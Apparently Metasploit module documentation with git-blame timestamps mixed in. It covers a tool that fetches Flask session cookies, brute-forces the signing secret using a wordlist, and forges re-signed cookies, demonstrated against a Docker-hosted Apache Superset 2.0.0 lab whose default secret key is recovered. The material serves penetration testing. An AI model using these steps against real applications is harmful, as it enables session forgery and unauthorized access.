2023-08-01 18:27:25 -04:00
## Vulnerable Application
2023-09-07 16:11:11 -04:00
This is a generic module which can manipulate Python Flask-based application cookies.
The Retrieve action will connect to a web server, grab the cookie, and decode it.
The Resign action will do the same as above, but after decoding it, it will replace
2023-08-01 18:27:25 -04:00
the contents with that in NEWCOOKIECONTENT, then sign the cookie with SECRET. This
2023-09-07 16:11:11 -04:00
cookie can then be used in a browser. This is a Ruby based implementation of some
of the features in the Python project Flask-Unsign.
2023-08-01 18:27:25 -04:00
### Example Application
Apache Superset can be used since it is based on Flask.
```
2023-09-07 16:11:11 -04:00
sudo docker run -p 8088:8088 --name superset apache/superset:2.0.0
2023-08-01 18:27:25 -04:00
sudo docker exec -it superset superset fab create-admin \
--username admin \
--firstname Superset \
--lastname Admin \
--email admin@superset.com \
--password admin
sudo docker exec -it superset superset db upgrade
sudo docker exec -it superset superset init
```
## Verification Steps
1. Install the application
1. Start msfconsole
1. Do: `use auxiliary/gather/python_flask_cookie_signer`
1. Do: `set rhosts [IP]`
1. Do: `run`
1. You should get a decoded cookie
## Actions
### Retrieve
Retrieve a cookie from an HTTP(s) server
2023-09-11 14:29:20 -04:00
### FindSecret
Using the provided wordlist, find the secret key used to sign the cookie
2023-08-01 18:27:25 -04:00
### Resign
2023-09-07 16:11:11 -04:00
Resign the specified cookie data
2023-08-01 18:27:25 -04:00
## Options
### TARGETURI
The URI which gives a cookie. Redirects are NOT followed.
### NEWCOOKIECONTENT
When action is set to `Resign` , the content of the decoded cookie will be replaced with this content.
### SECRET
When action is set to `Resign` , the cookie is signed with this secret.
2023-09-11 14:29:20 -04:00
### SECRET_KEYS_FILE
2023-09-12 15:52:58 -04:00
When action is set to `FindSecret` , a file containing secret keys to try. One per line. Defaults to `metasploit-framework/data/wordlists/flask_secret_keys.txt`
2023-08-01 18:27:25 -04:00
## Scenarios
### Apache Superset 2.0.0
2023-09-11 14:29:20 -04:00
#### Grab the cookie to make sure its a valid cookie that can be decoded. (Retrieve)
2023-08-01 18:27:25 -04:00
```
msf6 > use auxiliary/gather/python_flask_cookie_signer
2023-09-07 16:11:11 -04:00
msf6 auxiliary(gather/python_flask_cookie_signer) > set RHOSTS 192.168.159.128
RHOSTS => 192.168.159.128
msf6 auxiliary(gather/python_flask_cookie_signer) > set RPORT 8088
RPORT => 8088
msf6 auxiliary(gather/python_flask_cookie_signer) > set TARGETURI /login
TARGETURI => /login
2023-08-01 18:27:25 -04:00
msf6 auxiliary(gather/python_flask_cookie_signer) > run
2023-09-07 16:11:11 -04:00
[*] Running module against 192.168.159.128
2023-08-01 18:27:25 -04:00
2023-09-07 16:11:11 -04:00
[*] 192.168.159.128:8088 - Retrieving Cookie
[*] 192.168.159.128:8088 - Initial Cookie: session=eyJjc3JmX3Rva2VuIjoiZDU2N2U1ZDJmYmU1NDIyOTRlMzFhODU5YWFiMjQ5MTcwMDcyNTNhMyIsImxvY2FsZSI6ImVuIn0.ZPoc7Q.y_slNhIvS7PDX1gKMYpBS1nW0L0
[*] 192.168.159.128:8088 - Decoded Cookie: {"csrf_token"=>"d567e5d2fbe542294e31a859aab24917007253a3", "locale"=>"en"}
2023-08-01 18:27:25 -04:00
[*] Auxiliary module execution completed
2023-09-11 14:29:20 -04:00
```
#### Determine the secret key (FindSecret)
```
msf6 auxiliary(gather/python_flask_cookie_signer) > set action FindSecret
action => findsecret
msf6 auxiliary(gather/python_flask_cookie_signer) > run
[*] Running module against 127.0.0.1
[*] 127.0.0.1:8088 - Retrieving Cookie
[*] 127.0.0.1:8088 - Initial Cookie: session=eyJjc3JmX3Rva2VuIjoiZjNlMjU1MzBkZWNkYjE4YzRkYWMxMTQzODgyYjg1ODlmMWM3YzFjYyIsImxvY2FsZSI6ImVuIn0.ZP9b0w.PjZZJJ1lSiUQPacotJV0zbxX3fU
[+] 127.0.0.1:8088 - Found secret key: CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET
[*] Auxiliary module execution completed
```
#### Sign a new cookie (Resign)
```
2023-09-07 16:11:11 -04:00
msf6 auxiliary(gather/python_flask_cookie_signer) > set NEWCOOKIECONTENT '{"csrf_token"=>"08e51dd1f352d6790e6ab9b99dadd621602b9189", "locale"=>"fr"}'
NEWCOOKIECONTENT => {"csrf_token"=>"08e51dd1f352d6790e6ab9b99dadd621602b9189", "locale"=>"fr"}
msf6 auxiliary(gather/python_flask_cookie_signer) > set SECRET CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET
SECRET => CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET
msf6 auxiliary(gather/python_flask_cookie_signer) > set ACTION Resign
ACTION => Resign
2023-08-01 18:27:25 -04:00
msf6 auxiliary(gather/python_flask_cookie_signer) > run
2023-09-07 16:11:11 -04:00
[*] Running module against 192.168.159.128
2023-08-01 18:27:25 -04:00
2023-09-07 16:11:11 -04:00
[*] Attempting to sign with key: CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET
[+] 192.168.159.128:8088 - New signed cookie: session=IntcImNzcmZfdG9rZW5cIj0-XCIwOGU1MWRkMWYzNTJkNjc5MGU2YWI5Yjk5ZGFkZDYyMTYwMmI5MTg5XCIsIFwibG9jYWxlXCI9PlwiZnJcIn0i.ZPodFA.4hA6OiYpdxAUoOsA9L7DMTVOZkI
2023-08-01 18:27:25 -04:00
[*] Auxiliary module execution completed
2023-09-07 16:11:11 -04:00
msf6 auxiliary(gather/python_flask_cookie_signer) >
2023-08-01 18:27:25 -04:00
```
